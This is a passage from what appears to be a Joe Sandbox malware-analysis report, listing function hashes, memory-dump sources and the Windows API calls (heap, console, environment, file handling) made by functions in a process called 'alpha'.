                                                                                          • Opcode ID: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                                          • Instruction ID: fcba8d5a9684ee25d412cd4739c0d64f513f8cfb86c2c604bbda7469ec8056d3
                                                                                          • Opcode Fuzzy Hash: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                                          • Instruction Fuzzy Hash: 69319A3261ABC69AEB60CF21E8407E9B7A4FB88B85F444135EA5E87B54CF38D645C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                          • String ID:
                                                                                          • API String ID: 140117192-0
                                                                                          • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                          • Instruction ID: 78b715d821b8a0dcd391413ca72999e49da00721b06353e5b04abc5157fb7d42
                                                                                          • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                          • Instruction Fuzzy Hash: CD41A475A0EB46A5EB508B18F8903A573B4FB88745FA04136EA8EC2764DF7DE448E710
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: File_get_osfhandle$TimeWrite
                                                                                          • String ID:
                                                                                          • API String ID: 4019809305-0
                                                                                          • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                          • Instruction ID: 29544b5eb2208e2bfe6e22aab631b84de06e1b5066247a5dd810ef9d369f6361
                                                                                          • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                          • Instruction Fuzzy Hash: 2E318632A0A787A6EB904B249844378E7A1FF4ABA1F149238DD4DC7BD5CF7CD854A700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcstol$lstrcmp
                                                                                          • String ID:
                                                                                          • API String ID: 3515581199-0
                                                                                          • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                          • Instruction ID: 9bdb8dab74219af69268e8f6607a2f799463a5b45ef0c4b76555a8a807bcab10
                                                                                          • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                          • Instruction Fuzzy Hash: 8C21B432A0A68393E7644B79A69413AABA0FF8D791F155134DF4F82754CF6CE849A700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 2448200120-0
                                                                                          • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                          • Instruction ID: be1622fa90c2f6c5b2d257d7232d1add761b2d0f130b64789bf0945b5f55da2e
                                                                                          • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                          • Instruction Fuzzy Hash: 7D214F32E0A747A7E7689B11A850279B6A1FF89B91F584139EA0D83795CF3CE441AB40
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$DriveNamePathTypeVolume
                                                                                          • String ID:
                                                                                          • API String ID: 1029679093-0
                                                                                          • Opcode ID: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                          • Instruction ID: 5f47b3e35084a87cc738090de50eb8e3784ba90465276f601609d517a15f6743
                                                                                          • Opcode Fuzzy Hash: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                          • Instruction Fuzzy Hash: A2313A3270AB869AEB208F21D8943E967A4FB8DB85F544175DA4D87744DF3CD645C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1617791916-0
                                                                                          • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                          • Instruction ID: cc6ea7d77a61bb5b3536e3744e6c404386ad84369c905968871c47549abbbe5e
                                                                                          • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                          • Instruction Fuzzy Hash: 5521DD7170AB4396EA049B51A54007ABBA1FF8EFD1B549130DE5E83795DF3CE0059700
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E83C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6A0E83D0C
                                                                                            • Part of subcall function 00007FF6A0E83C24: towupper.MSVCRT ref: 00007FF6A0E83D2F
                                                                                            • Part of subcall function 00007FF6A0E83C24: iswalpha.MSVCRT ref: 00007FF6A0E83D4F
                                                                                            • Part of subcall function 00007FF6A0E83C24: towupper.MSVCRT ref: 00007FF6A0E83D75
                                                                                            • Part of subcall function 00007FF6A0E83C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E83DBF
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E9EA0F,?,?,?,00007FF6A0E9E925,?,?,?,?,00007FF6A0E7B9B1), ref: 00007FF6A0E76ABF
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E76AD3
                                                                                            • Part of subcall function 00007FF6A0E76B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF6A0E76AE8,?,?,?,00007FF6A0E9EA0F,?,?,?,00007FF6A0E9E925), ref: 00007FF6A0E76B8B
                                                                                            • Part of subcall function 00007FF6A0E76B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF6A0E76AE8,?,?,?,00007FF6A0E9EA0F,?,?,?,00007FF6A0E9E925), ref: 00007FF6A0E76B97
                                                                                            • Part of subcall function 00007FF6A0E76B84: RtlFreeHeap.NTDLL ref: 00007FF6A0E76BAF
                                                                                            • Part of subcall function 00007FF6A0E76B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E76AF1,?,?,?,00007FF6A0E9EA0F,?,?,?,00007FF6A0E9E925), ref: 00007FF6A0E76B39
                                                                                            • Part of subcall function 00007FF6A0E76B30: RtlFreeHeap.NTDLL ref: 00007FF6A0E76B4D
                                                                                            • Part of subcall function 00007FF6A0E76B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E76AF1,?,?,?,00007FF6A0E9EA0F,?,?,?,00007FF6A0E9E925), ref: 00007FF6A0E76B59
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E9EA0F,?,?,?,00007FF6A0E9E925,?,?,?,?,00007FF6A0E7B9B1), ref: 00007FF6A0E76B03
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E76B17
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                          • String ID:
                                                                                          • API String ID: 3512109576-0
                                                                                          • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                          • Instruction ID: 03fe9648fcd9b94c31b6e5a90b2f978b748607206b6edf46085d4d7c050d86c7
                                                                                          • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                          • Instruction Fuzzy Hash: 91216272D0AA8395EB049B65D4543B8BBA0FF5AB49F148036DA0EC7352DF3CA445E350
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7AF82), ref: 00007FF6A0E7B6D0
                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7AF82), ref: 00007FF6A0E7B6E7
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7AF82), ref: 00007FF6A0E7B701
                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7AF82), ref: 00007FF6A0E7B715
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$AllocSize
                                                                                          • String ID:
                                                                                          • API String ID: 2549470565-0
                                                                                          • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                          • Instruction ID: b1c90ee28b2c8d5c9674aad83d263d30b1db9b663b6f42f76ac29262d6c5afa0
                                                                                          • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                          • Instruction Fuzzy Hash: 29216672A0B783E6EA588B51E540179B6B1FF89B80B58D532EA0E83755DF3CE445E300
                                                                                          APIs
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6A0E8507A), ref: 00007FF6A0E9D01C
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6A0E8507A), ref: 00007FF6A0E9D033
                                                                                          • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6A0E8507A), ref: 00007FF6A0E9D06D
                                                                                          • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6A0E8507A), ref: 00007FF6A0E9D07F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                          • String ID:
                                                                                          • API String ID: 1033415088-0
                                                                                          • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                          • Instruction ID: 68e5de4557df5891212b10675d73529c22914400ca3dfda8703fe8d789f83bbb
                                                                                          • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                          • Instruction Fuzzy Hash: 40116D3161DA8296EA448B24F0541BABBE1FB8EB95F505135FA8E87B94DF3CD0459B00
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E81EA0: wcschr.MSVCRT(?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6A0EA0D54), ref: 00007FF6A0E81EB3
                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E75A2E
                                                                                          • _open_osfhandle.MSVCRT ref: 00007FF6A0E75A4F
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E937AA
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF6A0E937D2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                          • String ID:
                                                                                          • API String ID: 22757656-0
                                                                                          • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                          • Instruction ID: e84dd46319411e3f8c536e4a56e9bab855937b585c6485bd26942bce53296f20
                                                                                          • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                          • Instruction Fuzzy Hash: FF119472A1564697E7108B24E44833DBAA0FB89B75F644734E62E873D5CF3CD4499B00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                          • String ID:
                                                                                          • API String ID: 140117192-0
                                                                                          • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                          • Instruction ID: de7341eaff294e0fa4b986d100db65a47f8d58b4a410fc43f059cbba3fc9c882
                                                                                          • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                          • Instruction Fuzzy Hash: CC21A23591EB46A6EB408B04F8843A977B4FB89755F600035EA8EC2764DF7DE448D710
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6A0E95433,?,?,?,00007FF6A0E969B8,?,?,?,?,?,00007FF6A0E88C39), ref: 00007FF6A0E956C5
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E956D9
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6A0E95433,?,?,?,00007FF6A0E969B8,?,?,?,?,?,00007FF6A0E88C39), ref: 00007FF6A0E956FD
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E95711
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$FreeProcess
                                                                                          • String ID:
                                                                                          • API String ID: 3859560861-0
                                                                                          • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                          • Instruction ID: e25cef4678ad19850906aa53acf459895ec0a3b19f253437b2a05e0b61fbbdf8
                                                                                          • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                          • Instruction Fuzzy Hash: 97111C72A05B91D6DB108F66E4440ADFBB0F74DF85B998125EB4E43718DF38E456C740
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E78798), ref: 00007FF6A0E84AD6
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E78798), ref: 00007FF6A0E84AEF
                                                                                            • Part of subcall function 00007FF6A0E84A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A28
                                                                                            • Part of subcall function 00007FF6A0E84A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A66
                                                                                            • Part of subcall function 00007FF6A0E84A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A7D
                                                                                            • Part of subcall function 00007FF6A0E84A14: memmove.MSVCRT(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A9A
                                                                                            • Part of subcall function 00007FF6A0E84A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84AA2
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E78798), ref: 00007FF6A0E8EE64
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E8EE78
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                          • String ID:
                                                                                          • API String ID: 2759988882-0
                                                                                          • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                          • Instruction ID: 54046a3040238906ee25e717ca43a8250875ec41ed54866fb758e8dec0f95cd8
                                                                                          • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                          • Instruction Fuzzy Hash: 9AF06DB0A0AB83E6EF149B769414179A9E1FF8EB42B588474DD0EC2351EE3CA4089310
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
